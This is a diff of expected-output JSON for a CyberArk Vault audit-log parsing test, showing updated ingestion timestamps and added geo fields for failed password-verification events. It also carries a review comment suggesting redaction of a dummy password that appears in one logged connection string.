State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:28:07\",\"IsoTimestamp\":\"2021-03-15T17:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 127.0.0.1. 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829287\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server 127.0.0.1. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1198,7 +1243,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193654Z", + "ingested": "2021-12-14T14:42:29.505127795Z", "original": "\u003c7\u003e1 2021-03-15T17:33:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:33:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:33:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829597\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:33:17\",\"IsoTimestamp\":\"2021-03-15T17:33:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829597\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1311,7 +1356,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-12-09T13:37:01.193660Z", + "ingested": "2021-12-14T14:42:29.505128312Z", "original": "\u003c7\u003e1 2021-03-15T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829907\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:38:27\",\"IsoTimestamp\":\"2021-03-15T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829907\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1420,7 +1465,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-12-09T13:37:01.193665900Z", + "ingested": "2021-12-14T14:42:29.505128689Z", "original": "\u003c7\u003e1 2021-03-15T18:00:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:00:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:00:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:00:07\",\"IsoTimestamp\":\"2021-03-15T18:00:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1444,10 +1489,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
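Review bot: The regenerated expectation on the `+ "ingested"` side of this hunk still carries a cleartext credential into the indexed document: this record's `ExtraDetails` and its `Address` CAProperty hold a full ODBC connection string ending in `Password=1234`, and the whole thing is preserved verbatim inside `event.original`. The value is obviously a dummy in the fixture, but it documents that a CPM account whose Address field was filled with a DSN string leaks its logon password into the vault audit syslog and, through this pipeline, into Elasticsearch. Only the `ingested` timestamp changes here, so this is pre-existing behaviour rather than something the commit introduces; it would still be worth a caveat in the data stream's README and, if feasible, a redaction step (for example a gsub of `Password=[^;"]*` on the extra-details/address values before they are copied to ECS fields) backed by a fixture that asserts the redaction. The pipeline itself is not visible in this diff, so whether these values are also mapped onto `cyberarkpas.audit.*` fields is inferred from the fixture rather than confirmed.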
@@ -1531,7 +1585,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193671600Z", + "ingested": "2021-12-14T14:42:29.505129066Z", "original": "\u003c7\u003e1 2021-03-15T18:05:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831516\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:05:16\",\"IsoTimestamp\":\"2021-03-15T18:05:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
